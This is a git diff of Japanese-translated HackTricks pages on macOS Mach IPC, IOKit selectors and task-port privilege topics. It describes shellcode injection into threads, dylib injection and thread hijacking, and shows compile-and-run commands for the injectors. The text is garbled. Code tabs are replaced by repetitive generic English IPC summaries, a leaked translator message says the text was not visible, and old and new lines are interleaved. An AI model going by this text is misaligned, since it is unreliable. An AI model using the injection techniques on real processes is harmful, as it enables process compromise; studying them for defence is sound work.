次のステップでは、**`IOExternalMethodDispatch2022`** 構造体を定義しておく必要があります。これは[https://github.com/apple-oss-distributions/xnu/blob/1031c584a5e37aff177559b9f69dbd3c8c3fd30a/iokit/IOKit/IOUserClient.h#L168-L176](https://github.com/apple-oss-distributions/xnu/blob/1031c584a5e37aff177559b9f69dbd3c8c3fd30a/iokit/IOKit/IOUserClient.h#L168-L176)でオープンソースで提供されています。以下のように定義できます:
<figure><img src="../../../.gitbook/assets/image (698).png" alt=""><figcaption></figcaption></figure>
これで、`(IOExternalMethodDispatch2022 *)&sIOExternalMethodArray` の後に多くのデータが表示されます:
そして、`(IOExternalMethodDispatch2022 *)&sIOExternalMethodArray` に従って、多くのデータを見ることができます:
<figure><img src="../../../.gitbook/assets/image (704).png" alt="" width="563"><figcaption></figcaption></figure>
@ -219,16 +219,16 @@ OSObject * target, void * reference)
<figure><img src="../../../.gitbook/assets/image (707).png" alt="" width="563"><figcaption></figcaption></figure>
そして、ここには **7つの要素の配列** があることがわかります最終的な逆コンパイルされたコードを確認してください。7つの要素の配列を作成するためにクリックします
そして、ここには**7つの要素の配列**があることがわかります最終的な逆コンパイルされたコードを確認してください。7つの要素の配列を作成するためにクリックしてください
<figure><img src="../../../.gitbook/assets/image (708).png" alt="" width="563"><figcaption></figcaption></figure>
配列が作成された後、すべてのエクスポートされた関数が表示されます:
配列が作成された後、すべてのエクスポートされた関数を確認できます:
<figure><img src="../../../.gitbook/assets/image (709).png" alt=""><figcaption></figcaption></figure>
{% hint style="success" %}
覚えているかもしれませんが、ユーザースペースから**エクスポートされた**関数を**呼び出す**ためには、関数の名前ではなく**セレクタ番号**を呼び出す必要があります。ここでは、セレクタ **0** が関数 **`initializeDecoder`**、セレクタ **1****`startDecoder`**、セレクタ **2** **`initializeEncoder`** であることがわかります...
覚えておいてください。ユーザースペースから**エクスポートされた**関数を**呼び出す**際には、関数の名前ではなく**セレクタ番号**を呼び出す必要があります。ここで、セレクタ **0** は関数 **`initializeDecoder`**、セレクタ **1****`startDecoder`**、セレクタ **2** **`initializeEncoder`** であることがわかります...
{% endhint %}
<details>
@ -238,7 +238,7 @@ OSObject * target, void * reference)
* ¿Trabajas en una **empresa de ciberseguridad**? ¿Quieres ver tu **empresa anunciada en HackTricks**? ¿O quieres tener acceso a la **última versión de PEASS o descargar HackTricks en PDF**? ¡Consulta los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)!
* Descubre [**The PEASS Family**](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Obtén el [**swag oficial de PEASS y HackTricks**](https://peass.creator-spring.com)
* **Únete al** [**💬**](https://emojipedia.org/speech-balloon/) **grupo de Discord** o al [**grupo de telegram**](https://t.me/peass) o **sígueme** en **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live).
* **Únete al** [**💬**](https://emojipedia.org/speech-balloon/) **grupo de Discord** o al [**grupo de telegram**](https://t.me/peass) o **sígueme** en **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks\_live).
* **Comparte tus trucos de hacking enviando PR a** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **y** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
</details>

247
macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/README.md
View file

@ -1,77 +1,59 @@
```markdown
# macOS IPC - プロセス間通信
<details>
<summary><strong>AWSハッキングをゼロからヒーローまで学ぶには</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>をご覧ください</strong></summary>
<summary><strong>htARTEHackTricks AWS Red Team Expert</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>でゼロからヒーローまでAWSハッキングを学ぶ</strong></a><strong></strong></summary>
HackTricksをサポートする他の方法:
HackTricksをサポートする他の方法
* **HackTricksにあなたの会社を広告したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASS & HackTricksグッズ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見する、私たちの独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)コレクション
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)や[**テレグラムグループ**](https://t.me/peass)に**参加する**か、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)を**フォローする**。
* [**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出して、あなたのハッキングのコツを**共有する**。
- **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
- [**公式PEASSHackTricksグッズ**](https://peass.creator-spring.com)を入手する
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)コレクションを見つける
- **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter**で私をフォローする🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**。**
- **ハッキングトリックを共有するには、[HackTricks](https://github.com/carlospolop/hacktricks)と[HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してください。**
</details>
## Machメッセージングとポート
## ポートを介したMachメッセージング
### 基本情報
Machは**タスク**をリソース共有の**最小単位**として使用し、各タスクは**複数のスレッド**を含むことができます。これらの**タスクとスレッドはPOSIXプロセスとスレッドに1:1でマッピングされます**。
Machはリソースを共有するための**最小単位としてタスク**を使用し、各タスクには**複数のスレッド**が含まれることができます。これらの**タスクとスレッドは、1:1でPOSIXプロセスとスレッドにマップされます**。
タスク間の通信はMachプロセス間通信IPCを介して行われ、片方向の通信チャネルを使用します。**メッセージはポート間で転送され**、これらはカーネルによって管理される**メッセージキュー**のように機能します。
タスク間の通信はMachプロセス間通信IPCを介して行われ、一方向の通信チャネルを利用します。**メッセージはポート間で転送**され、これらはカーネルによって管理される**メッセージキューのように機能**します。
各プロセスには**IPCテーブル**があり、そこにはプロセスの**machポート**が見つかります。machポートの名前は実際には番号(カーネルオブジェクトへのポインタ)です。
各プロセスには**IPCテーブル**があり、そこにはプロセスの**Machポート**が見つかります。Machポートの名前は実際には数値(カーネルオブジェクトへのポインタ)です。
プロセスはまた、ある権利を持つポート名を**異なるタスクに送信**することができ、カーネルはこのエントリを**他のタスクのIPCテーブル**に表示させます。
プロセスはまた、**別のタスクにポート名といくつかの権限を送信**することができ、カーネルはこれを他のタスクの**IPCテーブルにエントリとして表示**します。
### ポート権限
ポート権限は、タスクが実行できる操作を定義し、この通信の鍵となります。可能な**ポート権限**は以下の通りです:
タスクが実行できる操作を定義する**ポート権限**は、この通信に重要です。可能な**ポート権限**は以下の通りです[ここからの定義](https://docs.darlinghq.org/internals/macos-specifics/mach-ports.html)
* **受信権限**は、ポートに送信されたメッセージを受信することを可能にします。MachポートはMPSC複数生産者、単一消費者キューであり、システム全体で**各ポートに対して受信権限が1つだけ存在する**ことを意味します(パイプとは異なり、複数のプロセスが1つのパイプの読み取り端に対するファイルディスクリプタを持つことができます
* **受信権限を持つタスク**はメッセージを受信し、メッセージを送信するための**送信権限を作成**することができます。元々は**自分のタスクだけが自分のポートに対する受信権限を持っています**。
* **送信権限**は、ポートにメッセージを送信することを可能にします
* 送信権限は**複製**することができるので、送信権限を持つタスクは権限を複製し、**第三のタスクに付与することができます**
* **一度送信権限**は、ポートに1つのメッセージを送信した後に消える権限です
* **ポートセット権限**は、単一のポートではなく_ポートセット_を示します。ポートセットからメッセージをデキューすると、それに含まれるポートの1つからメッセージがデキューされます。ポートセットは、Unixの`select`/`poll`/`epoll`/`kqueue`のように、同時に複数のポートを監視するために使用できます。
* **デッドネーム**は、実際のポート権限ではなく、単なるプレースホルダーです。ポートが破壊されると、そのポートへの既存のすべてのポート権限がデッドネームに変わります。
- **受信権限**ポートに送信されたメッセージを受信する権限。MachポートはMPSCmultiple-producer, single-consumerキューであり、システム全体で**各ポートにつき1つの受信権限しか存在しない**ことを意味します(複数のプロセスが1つのパイプの読み取り端に対するファイルディスクリプタを持つことができるパイプとは異なります)。
- **受信権限を持つタスク**はメッセージを受信し、**送信権限を作成**できるため、メッセージを送信できます。元々は**自分のタスクが自分のポートに対して受信権限を持っていました**。
- **送信権限**:ポートにメッセージを送信する権限
- 送信権限は**クローン**できるため、送信権限を所有するタスクは権限を複製して**第三のタスクに付与**できます
- **一度だけ送信権限**ポートに1度だけメッセージを送信し、その後消える権限
- **ポートセット権限**単一のポートではなく_ポートセット_を示す権限。ポートセットからメッセージをデキューすると、それに含まれるポートの1つからメッセージがデキューされます。ポートセットは、Unixの`select`/`poll`/`epoll`/`kqueue`のように複数のポートで同時にリッスンするために使用できます。
- **デッドネーム**:実際のポート権限ではなく、単なるプレースホルダーです。ポートが破棄されると、ポートへのすべての既存のポート権限がデッドネームに変わります。
**タスクは他のタスクにSEND権限を譲渡することができ**、それによってメッセージを返送することが可能になります。**SEND権限は複製することもできるので、タスクは権限を複製して第三のタスクに付与することができます**。これにより、**ブートストラップサーバー**として知られる中間プロセスを組み合わせることで、タスク間の効果的な通信が可能になります。
**タスクはSEND権限を他のタスクに転送**して、メッセージを返信できるようにします。**SEND権限はクローン**されることもあり、タスクは権限を複製して**第三のタスクに付与**できます。これにより、**ブートストラップサーバ**と呼ばれる中間プロセスと組み合わせることで、タスク間の効果的な通信が可能となります。
### 通信の確立
#### 手順:
#### 手順
述べられているように、通信チャネルを確立するために、**ブートストラップサーバ**macでは**launchd**)が関与します。
通信チャネルを確立するために、**ブートストラップサーバ**macでは**launchd**)が関与します。
1. タスク**A**は**新しいポート**を開始し、その過程で**受信権限**を取得します。
2. 受信権限を持つタスク**A**は、ポートのための**送信権限を生成**します。
3. タスク**A**は**ブートストラップサーバー**と**接続**を確立し、ブートストラップ登録として知られる手順を通じて、**ポートのサービス名**と**送信権限**を提供します。
4. タスク**B**は、サービス名のブートストラップ**検索を実行するためにブートストラップサーバー**と対話します。成功すると、**サーバーはタスクAから受け取った送信権限を複製し、タスクBに転送します**
5. 送信権限を取得したタスク**B**は、**メッセージを作成**し、それをタスク**A**に**送信**することができます。
6. 双方向通信のために通常タスク**B**は新しいポートを生成し、**受信**権限と**送信**権限を持ち、タスク**A**に**送信権限を与える**ことで、タスク**B**にメッセージを送信できるようにします(双方向通信)。
1. タスク**A**は**新しいポート**を初期化し、プロセス内で**受信権限**を取得します。
2. 受信権限の所有者であるタスク**A**は、ポートに対して**送信権限を生成**します。
3. タスク**A**は、**ブートストラップサーバ**と**ポートのサービス名**、および**送信権限**を提供して、**ブートストラップ登録**として知られる手順を通じて**接続**を確立します。
4. タスク**B**は、**ブートストラップサーバ**と**サービス**名のブートストラップ**ルックアップ**を実行します。成功すると、**サーバ**はタスクAから受け取った**SEND権限を複製**し、**タスクBに送信**します
5. SEND権限を取得した後、タスク**B**は**メッセージを作成**し、それを**タスクAに送信**できます。
6. 双方向通信の場合、通常、タスク**B**は**受信権限**と**送信権限**を持つ新しいポートを生成し、**SEND権限をタスクAに与え**ます(双方向通信)。
ブートストラップサーバーは、タスクが主張するサービス名を**認証することはできません**。これは、タスクが**任意のシステムタスクを偽装する可能性がある**ことを意味します。例えば、**認証サービス名を偽って主張し**、その後すべてのリクエストを承認するなどです。
その後、Appleは**システム提供のサービス名**をSIP保護されたディレクトリ`/System/Library/LaunchDaemons`および`/System/Library/LaunchAgents`にある安全な設定ファイルに保存します。各サービス名とともに、**関連するバイナリも保存されます**。ブートストラップサーバーは、これらのサービス名ごとに**受信権限を作成し保持します**。
これらの事前定義されたサービスの場合、**検索プロセスはわずかに異なります**。サービス名が検索されると、launchdはサービスを動的に開始します。新しいワークフローは以下の通りです
* タスク**B**は、サービス名のブートストラップ**検索**を開始します。
* **launchd**はタスクが実行中かどうかを確認し、実行中でなければ**開始**します。
* タスク**A**(サービス)は**ブートストラップチェックイン**を実行します。ここで、**ブートストラップ**サーバーは送信権限を作成し、それを保持し、**受信権限をタスクAに転送します**。
* launchdは**送信権限を複製し、タスクBに送信します**。
* タスク**B**は新しいポートを生成し、**受信**権限と**送信**権限を持ち、タスク**A**(サービス)に**送信権限を与える**ことで、タスク**B**にメッセージを送信できるようにします(双方向通信)。
ただし、このプロセスは事前定義されたシステムタスクにのみ適用されます。非システムタスクは元々説明されたように動作し、偽装を可能にする可能性があります。
### Machメッセージ
Machメッセージは、**`mach_msg`関数**(基本的にはシステムコール)を使用して送信または受信されます。送信時には、この呼び出しの最初の引数は**メッセージ**でなければならず、それは**`mach_msg_header_t`**で始まり、その後に実際のペイロードが続きます:
```
ブートストラップサーバは、タスクが主張するサービス名を**認証できません**。これは、タスクが潜在的に**任意のシステムタスクをなりすます**可能性があることを意味します。
```c
typedef struct {
mach_msg_bits_t msgh_bits;
@ -82,36 +64,34 @@ mach_port_name_t msgh_voucher_port;
mach_msg_id_t msgh_id;
} mach_msg_header_t;
```
以下は、machポートに関するメッセージの受信と送信の権限について説明しています。
プロセスが _**受信権限**_ を持っている場合、Mach ポートでメッセージを受信できます。逆に、**送信者** は _**送信権限**_ または _**一度だけ送信権限**_ を付与されます。一度だけ送信権限は、1回のメッセージ送信後に無効になります。
machポートでメッセージを**受信**できるプロセスは、_**受信権**_を持っていると言われ、**送信者**は_**送信**_または_**一回限りの送信**_**権**を持っています。一回限りの送信は、名前が示す通り、単一のメッセージを送信した後に無効になります。
簡単な**双方向通信**を実現するために、プロセスはmach **メッセージヘッダー**に**machポート**を指定できます。これは_返信ポート_**`msgh_local_port`**)と呼ばれ、メッセージの**受信者**がこのメッセージに**返信を送信**できる場所です。**`msgh_bits`**のビットフラグを使用して、このポートに対して**一回限りの送信** **権**が派生され、転送されることを**示す**ことができます(`MACH_MSG_TYPE_MAKE_SEND_ONCE`)。
簡単な **双方向通信** を実現するために、プロセスは **mach メッセージヘッダー**_返信ポート_ (**`msgh_local_port`**) と呼ばれる mach ポートを指定できます。メッセージの **受信者** はこのメッセージに対して返信を送信できます。**`msgh_bits`** のビットフラグを使用して、このポートに対して **一度だけ送信権限** が派生して転送されることを示すことができます (`MACH_MSG_TYPE_MAKE_SEND_ONCE`)。
{% hint style="success" %}
この種の双方向通信は、返信が期待されるXPCメッセージで使用されます`xpc_connection_send_message_with_reply`および`xpc_connection_send_message_with_reply_sync`)。しかし、**通常は異なるポートが作成されます**。これは以前に説明したように双方向通信を作成するためです。
XPC メッセージで期待される返信を受信するためにこの種の双方向通信が使用されます (`xpc_connection_send_message_with_reply` および `xpc_connection_send_message_with_reply_sync`)。ただし、通常は異なるポートが作成され、双方向通信が確立されます。
{% endhint %}
メッセージヘッダーの他のフィールドには以下が含まれます:
メッセージヘッダーの他のフィールドは次のとおりです:
* `msgh_size`: パケット全体のサイズ。
* `msgh_remote_port`: このメッセージが送信されるポート。
* `msgh_voucher_port`: [mach vouchers](https://robert.sesek.com/2023/6/mach_vouchers.html)。
* `msgh_id`: 受信者によって解釈されるこのメッセージのID。
* `msgh_voucher_port`: [mach バウチャー](https://robert.sesek.com/2023/6/mach\_vouchers.html)。
* `msgh_id`: 受信者によって解釈されるこのメッセージの ID。
{% hint style="danger" %}
**machメッセージは**_**machポート**_を介して送信されることに注意してください。これはmachカーネルに組み込まれた**単一受信者**、**複数送信者**の通信チャネルです。**複数のプロセス**がmachポートにメッセージを**送信**できますが、ある時点で**単一のプロセスのみが**それから読み取ることができます。
**mach メッセージは**_**mach ポート**_**を介して送信され、これは mach カーネルに組み込まれた**単一の受信者**、**複数の送信者**通信チャネルです。**複数のプロセス**が mach ポートにメッセージを送信できますが、いつでも**1つのプロセスだけが**それから読み取ることができます。
{% endhint %}
### ポートの列挙
```bash
lsmp -p <pid>
```
このツールはiOSにインストールすることができ、[http://newosxbook.com/tools/binpack64-256.tar.gz](http://newosxbook.com/tools/binpack64-256.tar.gz) からダウンロードしてください。
iOSでこのツールをインストールするには、[http://newosxbook.com/tools/binpack64-256.tar.gz](http://newosxbook.com/tools/binpack64-256.tar.gz) からダウンロードしてください。
### コード例
**送信者**がポートを**割り当て**、`org.darlinghq.example`という名前の**送信権**を作成し、それを**ブートストラップサーバー**に送信する一方で、受信者はその名前の**送信権**を要求し、それを使用して**メッセージを送信**することに注意してください
**sender** がポートを**割り当て**、名前 `org.darlinghq.example` の**送信権**を作成し、それを**ブートストラップサーバー**に送信する方法に注目してください。送信者はその名前の**送信権**を要求し、それを使用して**メッセージを送信**しました
{% tabs %}
{% tab title="receiver.c" %}
@ -183,6 +163,26 @@ printf("Text: %s, number: %d\n", message.some_text, message.some_number);
{% endtab %}
{% tab title="sender.c" %}
### macOS IPC Inter-Process Communication
Inter-process communication (IPC) is a mechanism that allows processes to communicate and share data with each other. In macOS, IPC can be achieved using various techniques such as Mach ports, XPC services, and distributed notifications.
#### Mach Ports
Mach ports are a fundamental IPC mechanism in macOS. They allow processes to send messages and data to each other. Mach ports can be used for local IPC within the same system or for remote IPC between different systems.
#### XPC Services
XPC services are a high-level IPC mechanism provided by macOS. They allow processes to create and manage lightweight services that can communicate with each other. XPC services are commonly used for inter-process communication in macOS applications.
#### Distributed Notifications
Distributed notifications are a way for processes to broadcast information to other processes. This mechanism allows processes to observe changes and events happening in the system. Distributed notifications can be used for various purposes, such as triggering actions based on system events.
Understanding these IPC mechanisms is essential for developing secure and efficient macOS applications. By leveraging IPC effectively, developers can create robust applications that communicate seamlessly and securely with each other.
{% endtab %}
```c
// Code from https://docs.darlinghq.org/internals/macos-specifics/mach-ports.html
// gcc sender.c -o sender
@ -234,25 +234,22 @@ return 1;
printf("Sent a message\n");
}
```
{% endtab %}
{% endtabs %}
### 特権ポート
* **ホストポート**: プロセスがこのポートに対して**送信**権限を持っている場合、**システム**に関する**情報**を取得できます(例: `host_processor_info`
* **ホストプリブポート**: このポートに対して**送信**権限を持つプロセスは、カーネル拡張をロードするなどの**特権アクション**を実行できます。この権限を取得するには**プロセスがrootである必要があります**。
* さらに、**`kext_request`** APIを呼び出すためには、Appleのバイナリにのみ与えられる**`com.apple.private.kext*`**という他の権限が必要です。
* **タスク名ポート**: _タスクポート_ の非特権バージョンです。タスクを参照しますが、制御することはできません。`task_info()`を通じて利用できる唯一のもののようです。
* **タスクポート**(別名カーネルポート): このポートに対する送信権限があると、タスクを制御することができます(メモリの読み書き、スレッドの作成など)。
* 呼び出し元タスクのこのポートの名前を取得するには、`mach_task_self()`を呼び出します。このポートは**`exec()`**を介してのみ**継承**されます。`fork()`で作成された新しいタスクは新しいタスクポートを取得します特別なケースとして、suidバイナリで`exec()`を行った後のタスクも新しいタスクポートを取得します)。タスクを生成してそのポートを取得する唯一の方法は、`fork()`を行う際に["ポートスワップダンス"](https://robert.sesek.com/2014/1/changes\_to\_xnu\_mach\_ipc.html)を実行することです。
* ポートへのアクセス制限は以下の通りです(バイナリ`AppleMobileFileIntegrity`の`macos_task_policy`から):
* アプリが**`com.apple.security.get-task-allow`権限**を持っている場合、**同じユーザーのプロセスはタスクポートにアクセスできます**Xcodeによってデバッグ用に一般的に追加されます。**ノタリゼーション**プロセスは、本番リリースには許可しません。
* **`com.apple.system-task-ports`**権限を持つアプリは、カーネルを除く**任意の**プロセスの**タスクポートを取得できます**。古いバージョンでは**`task_for_pid-allow`**と呼ばれていました。これはAppleアプリケーションにのみ付与されます。
* **ルートは、ハード化された**ランタイムでコンパイルされていないそしてAppleからではないアプリケーションのタスクポートにアクセスできます。
- **ホストポート**: プロセスがこのポートに対して**Send**権限を持っている場合、**システム**に関する**情報**(例:`host_processor_info`)を取得できます。
- **ホスト特権ポート**: このポートに対して**Send**権限を持つプロセスは、カーネル拡張機能の読み込みなどの**特権アクション**を実行できます。この権限を取得するには、**プロセスはrootである必要があります**。
- さらに、**`kext_request`** APIを呼び出すには、Appleのバイナリにのみ与えられる**`com.apple.private.kext*`**という他の権限が必要です。
- **タスク名ポート**: _タスクポート_の権限がないバージョンです。タスクを参照しますが、それを制御することはできません。これを介して利用可能なのは`task_info()`だけです。
- **タスクポート**(別名カーネルポート)**: このポートに対してSend権限があると、タスクを制御できます(メモリの読み書き、スレッドの作成など)。
- 呼び出し`mach_task_self()`を使用して、呼び出し元タスクのためのこのポートの**名前を取得**します。このポートは**`exec()`**を横断してのみ**継承**されます。`fork()`で作成された新しいタスクは新しいタスクポートを取得します特別なケースとして、suidバイナリ内の`exec()`後にもタスクは新しいタスクポートを取得します)。タスクを生成し、そのポートを取得する唯一の方法は、`fork()`を実行しながら["port swap dance"](https://robert.sesek.com/2014/1/changes\_to\_xnu\_mach\_ipc.html)を実行することです。
- これらは、ポートへのアクセス制限です(バイナリ`AppleMobileFileIntegrity`の`macos_task_policy`から):
- アプリが**`com.apple.security.get-task-allow`権限**を持っている場合、**同じユーザーのプロセスがタスクポートにアクセス**できますデバッグ用にXcodeによって一般的に追加されます。**ノータリゼーション**プロセスは、本番リリースではこれを許可しません。
- **`com.apple.system-task-ports`**権限を持つアプリは、カーネルを除く**任意の**プロセスの**タスクポートを取得**できます。以前のバージョンでは**`task_for_pid-allow`**と呼ばれていました。これはAppleアプリケーションにのみ付与されます。
- **Rootは、ハード化されたランタイムでコンパイルされていないアプリケーションのタスクポート**にアクセスできますApple製品ではないもの
### タスクポートを介したスレッドへのシェルコード注入
### タスクポートを介したスレッドへのシェルコードインジェクション
シェルコードは以下から取得できます:
シェルコードは以下から取得できます
{% content-ref url="../../macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md" %}
[arm64-basic-assembly.md](../../macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md)
@ -292,6 +289,34 @@ return 0;
{% endtab %}
{% tab title="entitlements.plist" %}
## macOS IPC (Inter-Process Communication)
### Introduction
Inter-Process Communication (IPC) mechanisms are essential for processes to communicate with each other on macOS. There are various IPC mechanisms available on macOS, such as Mach ports, XPC services, Distributed Objects, and UNIX domain sockets.
### Mach Ports
Mach ports are a fundamental IPC mechanism on macOS, allowing processes to send messages and data between each other. They are used by the system and applications for various purposes, including inter-process communication and synchronization.
### XPC Services
XPC Services are a high-level IPC mechanism provided by the XPC framework on macOS. They allow applications to create separate processes to perform specific tasks in a secure and isolated manner. XPC Services are commonly used for background tasks and privileged operations.
### Distributed Objects
Distributed Objects is an IPC mechanism that allows objects to be passed between processes on macOS. It enables applications to communicate and share objects across different processes, providing a way to interact with remote objects as if they were local.
### UNIX Domain Sockets
UNIX domain sockets are a type of IPC mechanism that allows communication between processes on the same host. They provide a way for processes to exchange data locally without going through the network stack. UNIX domain sockets are commonly used for inter-process communication within a single system.
### Conclusion
Understanding the different IPC mechanisms available on macOS is crucial for developers and security professionals to design secure and efficient communication between processes. Each IPC mechanism has its strengths and use cases, and choosing the right one depends on the specific requirements of the application or system.
{% endtab %}
```xml
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
@ -304,7 +329,7 @@ return 0;
{% endtab %}
{% endtabs %}
前のプログラムを**コンパイル**し、同じユーザーでコードをインジェクトできるように**権限**を追加してください(そうしないと**sudo**を使用する必要があります)。
前のプログラムを**コンパイル**し、同じユーザーでコードをインジェクトできるように**権限**を追加します(そうでない場合は**sudo**を使用する必要があります)。
<details>
@ -505,36 +530,26 @@ inject(pid);
return 0;
}
```
<details>
<summary>macOS IPC (Inter-Process Communication)</summary>
</details>
macOS supports various IPC mechanisms, including:
## macOS IPC (Inter-Process Communication)
- **Mach messages**: A low-level mechanism for communication between processes and the kernel.
- **XPC**: A high-level API for inter-process communication that uses Mach messages under the hood.
- **Distributed Notifications**: Allows processes to broadcast information to multiple listeners.
- **Shared memory**: Processes can map a portion of memory that can be accessed by other processes.
- **UNIX domain sockets**: Used for local inter-process communication using file system pathnames.
- **POSIX message queues**: Offers a standardized method for processes to send and receive messages.
- **Semaphores**: Used to control access to a common resource by multiple processes.
- **File locks**: Prevents concurrent access to a file by multiple processes.
### macOS IPC Overview
Each of these mechanisms has its own use cases and security considerations. For example, Mach messages are fundamental to macOS and are used for tasks like launching processes and managing permissions. XPC is often used by applications to communicate with privileged helper tools. Understanding these IPC mechanisms is crucial for system hardening and pentesting.
</details>
Inter-Process Communication (IPC) mechanisms are essential for processes to communicate and coordinate with each other on macOS. There are various IPC mechanisms available on macOS, including Mach ports, XPC services, Distributed Objects, and UNIX domain sockets. Understanding how these mechanisms work is crucial for both developers and security professionals to ensure secure communication between processes and prevent privilege escalation attacks.
```bash
gcc -framework Foundation -framework Appkit sc_inject.m -o sc_inject
./inject <pi or string>
```
### スレッドへのDylibインジェクション via タスクポート
### タスクポート経由でスレッドにおけるDylibのインジェクション
macOSでは、**スレッド**は**Mach**を介して、または**posixの`pthread` API**を使用して操作することができます。前のインジェクションで生成されたスレッドはMach APIを使用して生成されたため、**posix準拠ではありません**。
macOSでは、**スレッド**は**Mach**を使用するか**posix `pthread` api**を使用して操作される可能性があります。前回のインジェクションで生成したスレッドはMach apiを使用して生成されたため、**posixに準拠していません**。
単純なシェルコードを**インジェクトしてコマンドを実行することが可能でした**。なぜなら、posix準拠のAPIではなく、Machだけで動作する必要があったからです。**より複雑なインジェクション**では、**スレッド**も**posix準拠**である必要があります
**単純なシェルコードをインジェクト**してコマンドを実行することが可能でしたが、これは**posixに準拠する必要がなかった**ため、Machだけで動作しました。**より複雑なインジェクション**を行うには、スレッドが**posixに準拠している必要があります**
したがって、スレッドを**改善するためには**、**`pthread_create_from_mach_thread`**を呼び出して**有効なpthreadを作成する**べきです。その後、この新しいpthreadは**dlopenを呼び出して**システムから**dylibをロード**することができます。そのため、異なるアクションを実行するために新しいシェルコードを書く代わりに、カスタムライブラリをロードすることが可能です。
したがって、スレッドを**改善する**ためには、**`pthread_create_from_mach_thread`**を呼び出すべきです。これにより、有効なpthreadが作成されます。その後、この新しいpthreadは**dlopenを呼び出して**システムから**dylibをロード**することができます。つまり、異なるアクションを実行するための新しいシェルコードを書く代わりに、カスタムライブラリをロードすることが可能です。
として、ログを生成し、それを監視することができる(例えば以下のような)**サンプルdylibs**を見つけることができます:
えば、(ログを生成してそれを聞くことができるものなど)**例のdylibs**を以下で見つけることができます:
{% content-ref url="../../macos-dyld-hijacking-and-dyld_insert_libraries.md" %}
[macos-dyld-hijacking-and-dyld\_insert\_libraries.md](../../macos-dyld-hijacking-and-dyld\_insert\_libraries.md)
@ -813,14 +828,32 @@ fprintf(stderr,"Dylib not found\n");
}
```
Since the provided text is not visible, I'm unable to translate it. Please provide the text you would like to have translated into Japanese.
</details>
## macOS IPC (Inter-Process Communication)
### Mach Ports
Mach ports are endpoints for inter-process communication in macOS. They are used by processes to send and receive messages. Each Mach port has a unique identifier and a set of send rights and receive rights. Processes can communicate with each other by sending messages through Mach ports.
### XPC Services
XPC (XPCOM) is a lightweight inter-process communication mechanism used in macOS. XPC services allow processes to communicate with each other securely. XPC services are defined by a .xpc file, which contains the service's executable code and configuration information.
### Distributed Objects
Distributed Objects is an inter-process communication technology in macOS that allows objects to be passed between processes. It enables processes to interact with each other by passing Objective-C objects. Distributed Objects uses the NSConnection class to establish connections between processes.
### NSXPCConnection
NSXPCConnection is a class in macOS that facilitates communication between processes using XPC. It allows processes to create secure connections and exchange messages. NSXPCConnection is commonly used in macOS applications to implement secure inter-process communication.
```bash
gcc -framework Foundation -framework Appkit dylib_injector.m -o dylib_injector
./inject <pid-of-mysleep> </path/to/lib.dylib>
```
### スレッドハイジャック via タスクポート <a href="#step-1-thread-hijacking" id="step-1-thread-hijacking"></a>
### タスクポートを介したスレッドハイジャッキング <a href="#step-1-thread-hijacking" id="step-1-thread-hijacking"></a>
この技術ではプロセスのスレッドがハイジャックされます:
この技術ではプロセスのスレッドがハイジャックされます:
{% content-ref url="../../macos-proces-abuse/macos-ipc-inter-process-communication/macos-thread-injection-via-task-port.md" %}
[macos-thread-injection-via-task-port.md](../../macos-proces-abuse/macos-ipc-inter-process-communication/macos-thread-injection-via-task-port.md)
@ -830,9 +863,9 @@ gcc -framework Foundation -framework Appkit dylib_injector.m -o dylib_injector
### 基本情報
XPCは、macOSとiOSで使用されるカーネルであるXNUのInter-Process Communicationの略です。XPCは、システム上の異なるプロセス間で**安全で非同期なメソッド呼び出しを行うためのメカニズム**を提供します。これはAppleのセキュリティパラダイムの一部であり、各**コンポーネント**がその仕事をするために必要な**許可だけを持って実行される**特権分離アプリケーション**作成を可能にし**、侵害されたプロセスからの潜在的な損害を制限します。
XPCは、macOSおよびiOSで使用されるカーネルであるXNU間のプロセス間通信を意味し、**プロセス間の通信**のためのフレームワークです。 XPCは、システム上の異なるプロセス間で**安全で非同期なメソッド呼び出しを行うメカニズム**を提供します。これはAppleのセキュリティパラダイムの一部であり、**特権分離したアプリケーション**作成を可能にし、各**コンポーネント**が**必要な権限のみ**でジョブを実行するため、侵害されたプロセスからの潜在的な損害を制限します。
この**通信がどのように機能するか**、またそれが**どのように脆弱性になり得るか**についての詳細は以下をチェックしてください:
この**通信方法**や**脆弱性**についての詳細については、以下を参照してください:
{% content-ref url="../../macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/" %}
[macos-xpc](../../macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/)
